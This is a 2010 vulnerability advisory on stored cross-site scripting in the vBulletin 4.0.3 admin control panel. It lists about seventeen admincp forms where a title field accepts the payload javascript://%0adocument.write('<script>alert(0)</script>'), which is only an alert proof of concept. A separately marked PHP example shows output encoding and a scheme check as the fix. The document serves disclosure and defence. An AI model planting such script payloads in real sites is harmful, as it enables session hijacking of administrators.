###########################################################################
#
# -:: vBulletin [4.0.3] adminCP Cross-Site Scripting ::-
#
# Exploit Title: vBulletin adminCP Cross-Site Scripting
# Date: 2010
# Author: [ Ashiyane Digital Security Team ] [Cair3x]
# Software Link: http://www.vBulletin.com
# Version: 4.0.3
# Tested on: vBulletin 4.0.3
# Exploited: [ scriptplazza ]
###########################################################################
-:: Generic Smilies Manager => Add New Generic Smilies ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/image.php?do=add&table=smilie )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Avatars Manager => Add New Avatars ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/image.php?do=add&table=icon )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: User Titles Manager => Add New User Titles ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/usertitle.php?do=add )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: User Reputations Manager => Add New User Reputations ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/adminreputation.php?do=add )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: User Profile Fields Manager => Add New User Profile Fields ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/profilefield.php?do=add )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Usergroups Manager => Add New Usergroups ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Forum Announcements => Add New Announcements ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/announcement.php?do=add )
Go To ( http://127.0.0.1/vb/amodcp/announcement.php?do=add )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Forum Notices => Add New Notices ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/notice.php?do=add )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Forum Advertising => Add New Advertising ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/ad.php?do=add )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Forum Manager => Add New Forum Manager ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/forum.php?do=add )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Calendar Manager => Add New Calendar ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/admincalendar.php?do=add )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Usergroup Manager => Add New Usergroup ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: User Rank Manager => Rank Type ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/ranks.php?do=add )
Use the following code as the Text value (the "OR you may enter text" option; HTML is allowed):
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: BB Code Manager => Add New BB Code ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/bbcode.php?do=add )
Complete all required fields and enter the JavaScript code in Title:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Scheduled Task Manager => Add New Scheduled Task ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/cronadmin.php?do=edit )
Complete all required fields and enter the JavaScript code in Title:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: FAQ Manager => Add New FAQ Item ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/faq.php?do=add )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
-:: Style Manager => Add New Style ::-
Exploit :
Go To ( http://127.0.0.1/vb/admincp/template.php?do=addstyle )
Add a new title. Use the following code as the title name:
-:: javascript://%0adocument.write('<script>alert(0)</script>') ::- Or Any Other Xss Code
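
Every entry above stores a title (or rank text) value that the control panel later writes back into a page. As an added example, not vBulletin source code and not from the advisory's author, the PHP below contrasts an unescaped render with an output-encoded one and adds a scheme check for values used as links; the function names and the table-cell markup are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: illustrative code, not taken from vBulletin.
// Function names and the <td> markup are hypothetical.

// Constructed sample: the title value quoted in the advisory, as stored.
$storedTitle = "javascript://%0adocument.write('<script>alert(0)</script>')";

// Vulnerable pattern (assumed): the stored title is concatenated into the
// page verbatim, so any markup inside it is parsed by the admin's browser.
function render_title_unsafe(string $title): string
{
    return '<td>' . $title . '</td>';
}

// Hardened pattern: encode at output time for the HTML text/attribute context.
function render_title_safe(string $title): string
{
    return '<td>' . htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
}

// If a stored value is ever used as a link target, encoding alone is not
// enough: a javascript: URL needs no characters that HTML encoding would alter.
// Allow only http/https and fall back to an inert target otherwise.
function safe_href(string $url): string
{
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '#';
    }
    return htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

echo render_title_unsafe($storedTitle), PHP_EOL; // markup reaches the browser as markup
echo render_title_safe($storedTitle), PHP_EOL;   // markup reaches the browser as text
echo safe_href($storedTitle), PHP_EOL;           // non-http(s) scheme is rejected
echo safe_href('http://127.0.0.1/vb/'), PHP_EOL; // allowed scheme passes through
```

Encoding belongs at every place a stored title is printed, in the admin and moderator control panels as well as the public pages, since the values listed above are saved once and rendered many times.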